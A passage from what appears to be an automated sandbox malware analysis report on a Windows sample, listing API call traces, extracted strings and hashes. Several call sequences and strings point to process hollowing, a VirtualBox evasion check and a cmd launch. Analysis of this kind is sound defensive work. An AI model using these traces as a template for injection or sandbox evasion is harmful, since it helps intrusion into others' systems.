                                                                        • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                        • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                        • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                        • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                        • strstr.MSVCRT ref: 004088D6
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                        • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                        • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                        • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                        • wcscat.MSVCRT ref: 00408A5B
                                                                        • wcsstr.MSVCRT ref: 00408A82
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                        • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
                                                                        • strstr.MSVCRT ref: 00408E02
                                                                        • strstr.MSVCRT ref: 00408E16
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 40b2a2-40b2b7 6CDC4ED0
                                                                        APIs
                                                                        • 6CDC4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsRectSystem$ClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 1397294514-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acc360b84631b74d09ec7f062f2a1d47c7bcd5af942b88cc679ddd779a74eb1b
                                                                        • Instruction ID: 8d98cc9105d08355b1cf810246b7ffd1097ed42400f6c35155de0d25e350e30d
                                                                        • Opcode Fuzzy Hash: acc360b84631b74d09ec7f062f2a1d47c7bcd5af942b88cc679ddd779a74eb1b
                                                                        • Instruction Fuzzy Hash: ECB1036544E7C19FD7438B7888B58927FB0AE1761470E49DBC4C0CF4A3E1096A6EEB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52e45d8e796135177c14e507d8781eb3042a1784119a1155e8e3137822a8891d
                                                                        • Instruction ID: c7793d7827e5b5fadcbc3373e352903320769f94b33e024badf77ecf4e6e1933
                                                                        • Opcode Fuzzy Hash: 52e45d8e796135177c14e507d8781eb3042a1784119a1155e8e3137822a8891d
                                                                        • Instruction Fuzzy Hash: 1391136108E7C19FD7538B7888B58927FF0AE1764470E49DBC4C08F4A3D219696EEB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
